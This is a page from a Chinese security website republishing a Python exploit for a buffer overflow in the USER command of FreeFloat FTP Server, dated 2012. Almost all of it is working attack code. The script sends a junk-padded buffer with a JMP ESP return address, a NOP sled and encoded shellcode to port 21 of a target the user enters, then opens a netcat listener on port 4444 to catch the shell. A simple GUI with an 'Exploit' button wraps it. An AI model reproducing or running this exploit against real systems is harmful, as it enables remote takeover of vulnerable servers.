首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Free Float FTP Server USER Command Buffer Overflow
来源:vfocus.net 作者:D35m0nd142 发布时间:2012-12-10  

#Exploit title: FreeFloat FTP Server Remote Command Execution USER Command Buffer Overflow
#Date: 06/12/2012
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.freefoat.com
#Tested on Windows XP SP3 with Ubuntu 12.04
#!/usr/bin/python
import socket,sys,time,os
import Tkinter,tkMessageBox
os.system("clear")
def exploit():
 target = ip.get()
 junk = "\x41" * 230     # Offest Number --> 230
 eip = "\x53\x93\x37\x7E"  # 0x7E379353   FFE4             JMP ESP
 nops = "\x90" * 20
 payload =("\xb8\xe9\x78\x9d\xdb\xda\xd2\xd9\x74\x24\xf4\x5e\x2b\xc9" +
 "\xb1\x4f\x31\x46\x14\x83\xc6\x04\x03\x46\x10\x0b\x8d\x61" +
 "\x33\x42\x6e\x9a\xc4\x34\xe6\x7f\xf5\x66\x9c\xf4\xa4\xb6" +
 "\xd6\x59\x45\x3d\xba\x49\xde\x33\x13\x7d\x57\xf9\x45\xb0" +
 "\x68\xcc\x49\x1e\xaa\x4f\x36\x5d\xff\xaf\x07\xae\xf2\xae" + 
 "\x40\xd3\xfd\xe2\x19\x9f\xac\x12\x2d\xdd\x6c\x13\xe1\x69" +
 "\xcc\x6b\x84\xae\xb9\xc1\x87\xfe\x12\x5e\xcf\xe6\x19\x38" +
 "\xf0\x17\xcd\x5b\xcc\x5e\x7a\xaf\xa6\x60\xaa\xfe\x47\x53" +
 "\x92\xac\x79\x5b\x1f\xad\xbe\x5c\xc0\xd8\xb4\x9e\x7d\xda" +
 "\x0e\xdc\x59\x6f\x93\x46\x29\xd7\x77\x76\xfe\x81\xfc\x74" + 
 "\x4b\xc6\x5b\x99\x4a\x0b\xd0\xa5\xc7\xaa\x37\x2c\x93\x88" +
 "\x93\x74\x47\xb1\x82\xd0\x26\xce\xd5\xbd\x97\x6a\x9d\x2c" +
 "\xc3\x0c\xfc\x38\x20\x22\xff\xb8\x2e\x35\x8c\x8a\xf1\xed" +
 "\x1a\xa7\x7a\x2b\xdc\xc8\x50\x8b\x72\x37\x5b\xeb\x5b\xfc" +
 "\x0f\xbb\xf3\xd5\x2f\x50\x04\xd9\xe5\xf6\x54\x75\x56\xb6" + 
 "\x04\x35\x06\x5e\x4f\xba\x79\x7e\x70\x10\x0c\xb9\xe7\x5b" +
 "\xa7\x44\x78\x33\xba\x46\x69\x98\x33\xa0\xe3\x30\x12\x7b" +
 "\x9c\xa9\x3f\xf7\x3d\x35\xea\x9f\xde\xa4\x71\x5f\xa8\xd4" +
 "\x2d\x08\xfd\x2b\x24\xdc\x13\x15\x9e\xc2\xe9\xc3\xd9\x46" +
 "\x36\x30\xe7\x47\xbb\x0c\xc3\x57\x05\x8c\x4f\x03\xd9\xdb" +
 "\x19\xfd\x9f\xb5\xeb\x57\x76\x69\xa2\x3f\x0f\x41\x75\x39" +
 "\x10\x8c\x03\xa5\xa1\x79\x52\xda\x0e\xee\x52\xa3\x72\x8e" +
 "\x9d\x7e\x37\xbe\xd7\x22\x1e\x57\xbe\xb7\x22\x3a\x41\x62" +
 "\x60\x43\xc2\x86\x19\xb0\xda\xe3\x1c\xfc\x5c\x18\x6d\x6d" +
 "\x09\x1e\xc2\x8e\x18")
 sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

 try:
  sock.connect((target,21))
  print "\n\n[-] Sending exploit ..."
  print sock.recv(2000)
  sock.send("USER "+junk+eip+nops+payload+"\r\n")
  sock.close()
  os.system("nc -lvp 4444")
 except:
  print "[-] Connection to "+target+" failed! \n"
  sys.exit(0)


root=Tkinter.Tk()
root.geometry("%dx%d" %(700,375))
root.title("*** FreeFloat FTP Server Remote Code Execution USER Command Buffer Overflow***")
root['bg'] = 'black'
developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')
ip_answer=Tkinter.Label(text="IP Address ").pack()
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
root.mainloop()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nagios XI Network Monitor Grap
·Sumatra 2.1.1/MuPDF 1.0 Intege
·DIMIN Viewer 5.4.0 <= WriteAV
·Android Kernel 2.6 Local DoS C
·FreeVimager 4.1.0 <= WriteAV A
·Centrify Deployment Manager v2
·Geany <=1.22 Local Code inject
·TVMOBiLi 2.1.0.3557 Denial of
·FreeFloat FTP Server Arbitrary
·Dolphin3D 1.52 / 1.60 Command
·Maxthon3 about:history XCS Tru
·Splunk 5.0 Custom App Remote C
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved